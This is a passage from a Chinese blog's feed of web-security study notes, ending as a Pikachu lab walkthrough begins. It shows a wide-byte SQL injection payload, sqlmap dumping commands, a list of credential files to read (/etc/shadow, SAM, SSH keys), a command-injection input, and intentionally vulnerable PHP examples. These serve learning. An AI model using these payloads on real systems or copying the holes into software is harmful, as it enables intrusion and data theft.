如果在单引号前面输入%df使其变成<code>%df%5c%27</code>前面的<code>%df%5c</code>就会被解析为一个汉字, 单引号<code>%27</code>就成功逃逸了, 实现了闭合</li><li>payload修改为<code>vince%df' or 1=1;#</code></li></ul><h4 id="SQLmap使用"><a href="#SQLmap使用" class="headerlink" title="SQLmap使用"></a>SQLmap使用</h4><p><a href="https://sqlmap.highlight.ink/">文档介绍 - sqlmap 用户手册 (highlight.ink)</a></p><ol><li><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">-u "url" --cookie="xxx" //带上cookie对URL进行注入探测</span></span></code></pre></div></li><li><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">-u "url" --cookie="xxx" --current-db //获取数据库名</span></span></code></pre></div></li><li><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">-u "url" --cookie="xxx" -D xxx --tables //获取表名</span></span></code></pre></div></li><li><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">-u "url" --cookie="xxx" -D xxx -T xxx --columns //获取列名</span></span></code></pre></div></li><li><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">-u "url" --cookie="xxx" -D xxx -T xxx -C xxx yyy,zzz,xxx --dump //获取指定列的信息</span></span></code></pre></div><p><em>tip</em>:<code>--start 1 --stop 10 (只获取前十列数据)</code></p></li></ol><h2 id="文件漏洞"><a href="#文件漏洞" class="headerlink" title="文件漏洞"></a>文件漏洞</h2><h4 id="任意文件读取与下载"><a href="#任意文件读取与下载" class="headerlink" title="任意文件读取与下载"></a>任意文件读取与下载</h4><h5 id="介绍-1"><a href="#介绍-1" class="headerlink" title="介绍"></a>介绍</h5><ul><li><p>当网站需要提供文件读取或文件下载功能,且对用户读取或下载的文件不做限制,则用户就能够恶意读取或下载任意敏感文件</p></li><li><p>例如:</p></li></ul><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #676E95; font-style: italic">// 文件读取</span></span><span class="line"><span style="color: #89DDFF"><?</span><span style="color: #BABED8">php</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">filename </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">_GET</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">filename</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">];</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">filename</span><span style="color: #89DDFF">){</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">echo</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">file_get_contents</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">filename</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span></span><span class="line"><span style="color: #89DDFF">?></span></span></code></pre></div><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #676E95; font-style: italic">// 文件下载</span></span><span class="line"><span style="color: #89DDFF"><?</span><span style="color: #BABED8">php</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">filename </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">_GET</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">filename</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">];</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">file_exists</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">filename</span><span style="color: #89DDFF">)){</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">file</span><span style="color: #89DDFF">=</span><span style="color: #82AAFF">fopen</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">filename</span><span style="color: #89DDFF">,</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">r</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">header</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">Content-Type: application/octet-stream</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">header</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">Accept-Ranges: bytes</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">header</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">Accept-Length: </span><span style="color: #89DDFF">".</span><span style="color: #82AAFF">filesize</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">filename</span><span style="color: #89DDFF">));</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">header</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">Content-Disposition: attachment; filename=</span><span style="color: #89DDFF">"</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">.</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">filename</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">echo</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">fread</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">file</span><span style="color: #89DDFF">,</span><span style="color: #82AAFF">filesize</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">filename</span><span style="color: #89DDFF">));</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">fclose</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">file</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span></span><span class="line"><span style="color: #89DDFF">?></span></span></code></pre></div><h5 id="利用"><a href="#利用" class="headerlink" title="利用"></a>利用</h5><ul><li>获取常规的配置文件,如ssh,weblogic,ftp,mysql等相关配置</li><li>获取各种日志文件,从中寻找一些后台地址,文件上传点。甚至可能寻找到别人留下的后门</li><li>获取web业务文件进行白盒审计</li></ul><blockquote><h5 id="敏感信息"><a href="#敏感信息" class="headerlink" title="敏感信息"></a>敏感信息</h5><p>win:</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">C:\boot.ini 查看系统版本 </span></span><span class="line"><span style="color: #babed8">C:\Windows\System32\inetsrv\MetaBase.xml IIS配置文件 </span></span><span class="line"><span style="color: #babed8">C:\Windows\repair\sam 存储系统初次安装的密码 </span></span><span class="line"><span style="color: #babed8">C:\Program Files\mysql\my.ini Mysql配置 </span></span><span class="line"><span style="color: #babed8">C:\Program Files\mysql\data\mysql\user.MYD Mysql root </span></span><span class="line"><span style="color: #babed8">C:\Windows\php.ini php配置信息 </span></span><span class="line"><span style="color: #babed8">C:\Windows\my.ini Mysql配置信息</span></span></code></pre></div><p>linux:</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">/root/.ssh/*</span></span><span class="line"><span style="color: #babed8">/etc/passwd </span></span><span class="line"><span style="color: #babed8">/etc/shadow </span></span><span class="line"><span style="color: #babed8">/etc/my.cnf mysql配置文件</span></span><span class="line"><span style="color: #babed8">/etc/httpd/conf/httpd.conf apache配置文件</span></span><span class="line"><span style="color: #babed8">/root/.bash_history 用户历史命令记录文件</span></span><span class="line"><span style="color: #babed8">/root/.mysql_history mysql历史命令记录文件</span></span><span class="line"><span style="color: #babed8">/proc/self/fd/fd[0-9]*(文件标识符) </span></span><span class="line"><span style="color: #babed8">/proc/mounts 记录系统挂载设备</span></span><span class="line"><span style="color: #babed8">/proc/config.gz 内核配置文件</span></span><span class="line"><span style="color: #babed8">/proc/self/cmdline 当前进程的cmdline参数</span></span></code></pre></div></blockquote><h4 id="文件包含漏洞"><a href="#文件包含漏洞" class="headerlink" title="文件包含漏洞"></a>文件包含漏洞</h4><ul><li><p>当 <code>include</code>, <code>include_once</code>, <code>require</code>, <code>require_once</code> 包含一个文件时,这个文件被作为php代码执行</p></li><li><p>利用条件:</p><ul><li>网站对用户公开文件包含接口</li><li>文件包含接口未做验证或验证不严格</li></ul></li><li><p>例如:</p><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF"><?</span><span style="color: #BABED8">php</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">file </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">_GET</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">file</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">];</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">file_exists</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">file</span><span style="color: #89DDFF">)){</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">include</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">file</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">include</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">header.php</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span></span><span class="line"><span style="color: #89DDFF">?></span></span></code></pre></div></li></ul><h4 id="任意文件删除"><a href="#任意文件删除" class="headerlink" title="任意文件删除"></a>任意文件删除</h4><ul><li><p>当网站存在删除文件操作且其中某些关键字段用户可控时,可能导致用户恶意构造删除某些网站甚至系统文件</p></li><li><p>例如:</p><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #676E95; font-style: italic">/** do delete */</span></span><span class="line"><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">($</span><span style="color: #BABED8">action </span><span style="color: #89DDFF">==</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">delete</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">bakfile </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">trim</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">_GET</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">file</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">]);</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">filepath </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">DBak</span><span style="color: #89DDFF">-></span><span style="color: #BABED8">datadir</span><span style="color: #89DDFF">.</span><span style="color: #89DDFF">$</span><span style="color: #BABED8">bakfile</span><span style="color: #89DDFF">;</span></span><span class="line"></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">unlink</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">filepath</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">msgbox</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">文件删除成功!</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">fileurl</span><span style="color: #89DDFF">.'</span><span style="color: #C3E88D">?act=restore</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">msgbox</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">文件删除失败!</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span></span><span class="line"><span style="color: #89DDFF">}</span></span></code></pre></div></li></ul><h4 id="文件上传漏洞"><a href="#文件上传漏洞" class="headerlink" title="文件上传漏洞"></a>文件上传漏洞</h4><h5 id="利用条件"><a href="#利用条件" class="headerlink" title="利用条件"></a>利用条件</h5><ul><li>存在文件上传操作</li><li>未对上传文件做校验</li><li>用户可直接或间接访问到上传的文件并可执行</li></ul><p>例如:</p><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #676E95; font-style: italic">//DVWA</span></span><span class="line"><span style="color: #89DDFF"><?</span><span style="color: #BABED8">php</span></span><span class="line"><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #89DDFF">(</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">isset</span><span style="color: #89DDFF">(</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">_POST</span><span style="color: #89DDFF">[</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">Upload</span><span style="color: #89DDFF">'</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">]</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">target_path </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> DVWA_WEB_PAGE_TO_ROOT </span><span style="color: #89DDFF">.</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">hackable/uploads/</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">target_path </span><span style="color: #89DDFF">.=</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">basename</span><span style="color: #89DDFF">(</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">_FILES</span><span style="color: #89DDFF">[</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">uploaded</span><span style="color: #89DDFF">'</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">][</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">name</span><span style="color: #89DDFF">'</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">]</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">);</span></span><span class="line"></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #89DDFF">(</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">!</span><span style="color: #82AAFF">move_uploaded_file</span><span style="color: #89DDFF">(</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">_FILES</span><span style="color: #89DDFF">[</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">uploaded</span><span style="color: #89DDFF">'</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">][</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">tmp_name</span><span style="color: #89DDFF">'</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">],</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">target_path </span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">echo</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D"><pre>Your image was not uploaded.</pre></span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">echo</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D"><pre></span><span style="color: #89DDFF">{$</span><span style="color: #BABED8">target_path</span><span style="color: #89DDFF">}</span><span style="color: #C3E88D"> succesfully uploaded!</pre></span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span></span><span class="line"><span style="color: #89DDFF">}</span></span><span class="line"><span style="color: #89DDFF">?></span></span></code></pre></div><h2 id="命令执行漏洞"><a href="#命令执行漏洞" class="headerlink" title="命令执行漏洞"></a>命令执行漏洞</h2><ul><li>可以让攻击者总直接注入命令或恶意代码, 控制服务器后台</li></ul><h4 id="远程系统命令执行"><a href="#远程系统命令执行" class="headerlink" title="远程系统命令执行"></a>远程系统命令执行</h4><ul><li><p><strong>原理</strong>: 系统上存在给用户提供特点的远程命令操作的接口(如ping), 但是没有严格的安全控制措施</p></li><li><p>例如: </p><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF"><?</span><span style="color: #BABED8">php</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">isset</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">_POST</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">host</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">]))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">host </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">_POST</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">host</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">];</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">res </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">shell_exec</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">ping -c 4 </span><span style="color: #89DDFF">{$</span><span style="color: #BABED8">host</span><span style="color: #89DDFF">}"</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">echo</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">res</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span></span><span class="line"><span style="color: #89DDFF">?></span></span></code></pre></div></li><li><p>此时如果输入<code>127.0.0.1; ipconfig</code>就会把后面的命令也执行</p></li></ul><h2 id="越权漏洞"><a href="#越权漏洞" class="headerlink" title="越权漏洞"></a>越权漏洞</h2><ul><li>由于没有对用户权限进行严格的判断, 导致低权限账号可以去完成高权限账号的操作</li><li>属于逻辑漏洞, 是由于权限校验的逻辑不够严谨</li><li>水平越权<ul><li>同等权限级别间</li><li>服务器后台可能没有对用户权限做严格的判断, 可能导致一个用户能够执行另一个用户的操作</li></ul></li><li>垂直越权<ul><li>不同权限级别间</li><li>先抓取超级管理员执行增加用户的数据包, 然后退出登录, 改为登录普通管理员的账号, 将获取到的数据包的请求头中的cookie替换为普通管理员的cookie, 在请求体中填入操作信息</li></ul></li></ul><h2 id="请求伪造"><a href="#请求伪造" class="headerlink" title="请求伪造"></a>请求伪造</h2><h4 id="跨站请求伪造CSRF"><a href="#跨站请求伪造CSRF" class="headerlink" title="跨站请求伪造CSRF"></a>跨站请求伪造CSRF</h4><ul><li>通过伪装来自受信任用户的请求来利用受信任的网站</li></ul><h5 id="确认是否存在CSRF漏洞"><a href="#确认是否存在CSRF漏洞" class="headerlink" title="确认是否存在CSRF漏洞"></a>确认是否存在CSRF漏洞</h5><ul><li>判断请求是否可以被伪造</li><li>确认凭证的有效期</li></ul><h5 id="Token如何防止CDRF"><a href="#Token如何防止CDRF" class="headerlink" title="Token如何防止CDRF"></a>Token如何防止CDRF</h5><ul><li>每次请求增加一个随机码, 后台每次对次进行验证</li></ul><h4 id="服务端请求伪造SSRF"><a href="#服务端请求伪造SSRF" class="headerlink" title="服务端请求伪造SSRF"></a>服务端请求伪造SSRF</h4><ul><li>由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统</li></ul><p>数据流:攻击者—–>服务器—->目标地址</p><h5 id="形成原因"><a href="#形成原因" class="headerlink" title="形成原因"></a>形成原因</h5><ul><li><p>服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。</p><p>例如:</p><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF"><?</span><span style="color: #BABED8">php</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #C792EA">function</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">curl</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">url</span><span style="color: #89DDFF">){</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">ch </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">curl_init</span><span style="color: #89DDFF">();</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">curl_setopt</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">ch</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> CURLOPT_URL</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">url</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">curl_setopt</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">ch</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> CURLOPT_HEADER</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">curl_exec</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">ch</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">curl_close</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">ch</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #89DDFF">}</span></span><span class="line"><span style="color: #89DDFF">$</span><span style="color: #BABED8">url </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">_GET</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">url</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">];</span></span><span class="line"><span style="color: #82AAFF">curl</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">url</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #89DDFF">?></span></span></code></pre></div></li></ul><h2 id="会话管理漏洞"><a href="#会话管理漏洞" class="headerlink" title="会话管理漏洞"></a>会话管理漏洞</h2><h4 id="会话劫持"><a href="#会话劫持" class="headerlink" title="会话劫持"></a>会话劫持</h4><ul><li>获取用户Session ID后使用该Session ID进行伪装</li></ul><h5 id="攻击步骤"><a href="#攻击步骤" class="headerlink" title="攻击步骤"></a>攻击步骤</h5><ul><li><p>目标用户需要先登录站点</p></li><li><p>登录成功后,该用户会得到站点提供的一个会话标识SessionID</p></li><li><p>攻击者通过某种攻击手段捕获Session ID</p></li><li><p>攻击者通过捕获到的Session ID访问站点即可获得目标用户合法会话</p><p><em>#Session ID一般都设置在cookie中。</em></p></li></ul><h4 id="会话固定"><a href="#会话固定" class="headerlink" title="会话固定"></a>会话固定</h4><ul><li>诱骗受害者使用攻击者指定的会话标识</li></ul><h5 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h5><ul><li>访问网站时,网站会设置cookie中的session</li><li>当用户登录后,cookie中的session保持不变</li><li>只要获取登陆前的session内容,就可以知道登陆后的session</li></ul>]]></content>
<summary type="html"><h2 id="暴力破解漏洞"><a href="#暴力破解漏洞" class="headerlink" title="暴力破解漏洞"></a>暴力破解漏洞</h2><ul>
<li>通过系统地组合<strong>所有</strong>可能性(例如登录时用到的账户名、密码),尝试</summary>
<category term="网络安全" scheme="https://myprefer.github.io/tags/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/"/>
<category term="学习日志" scheme="https://myprefer.github.io/tags/%E5%AD%A6%E4%B9%A0%E6%97%A5%E5%BF%97/"/>
<category term="WEB攻防" scheme="https://myprefer.github.io/tags/WEB%E6%94%BB%E9%98%B2/"/>
<category term="漏洞分类" scheme="https://myprefer.github.io/tags/%E6%BC%8F%E6%B4%9E%E5%88%86%E7%B1%BB/"/>
</entry>
<entry>
<title>Pikachu靶场实操</title>
<link href="https://myprefer.github.io/post/Pikachu%E9%9D%B6%E5%9C%BA%E5%AE%9E%E6%93%8D.html"/>
<id>https://myprefer.github.io/post/Pikachu%E9%9D%B6%E5%9C%BA%E5%AE%9E%E6%93%8D.html</id>
<published>2024-02-04T01:57:16.000Z</published>
<updated>2024-04-21T12:46:40.163Z</updated>
<content type="html"><![CDATA[<h1 id="Pikachu靶场实操"><a href="#Pikachu靶场实操" class="headerlink" title="Pikachu靶场实操"></a>Pikachu靶场实操</h1><h2 id="暴力破解"><a href="#暴力破解" class="headerlink" title="暴力破解"></a>暴力破解</h2><h3 id="概述"><a href="#概述" class="headerlink" title="概述"></a>概述</h3><p>连续性尝试+字典+自动化</p><h4 id="字典"><a href="#字典" class="headerlink" title="字典"></a>字典</h4><ul><li>常用的账号密码</li><li>社工库</li><li>算法生成</li></ul><h4 id="暴力破解漏洞"><a href="#暴力破解漏洞" class="headerlink" title="暴力破解漏洞"></a>暴力破解漏洞</h4><ul><li>是否要求复杂密码</li><li>是否使用安全的验证码</li><li>是否进行次数限制</li><li>是否采用双元素认证</li></ul><h4 id="验证码"><a href="#验证码" class="headerlink" title="验证码"></a>验证码</h4><ul><li>防止登录暴力破解</li><li>防止机器恶意注册</li></ul><h4 id="测试流程"><a href="#测试流程" class="headerlink" title="测试流程"></a>测试流程</h4><ul><li>确认登录接口的脆弱性<ul><li>比如:尝试登录–抓包–观察验证元素和response信息</li></ul></li><li>对字典进行优化<ul><li>根据注册提示信息进行优化</li><li>管理员</li></ul></li><li>工具自动化操作</li></ul><h3 id="Pikachu关卡"><a href="#Pikachu关卡" class="headerlink" title="Pikachu关卡"></a>Pikachu关卡</h3><h4 id="基于表单的暴力破解"><a href="#基于表单的暴力破解" class="headerlink" title="基于表单的暴力破解"></a>基于表单的暴力破解</h4><p>此关没有设置验证码等防范措施, 使用Brup Suite的Intruder功能, 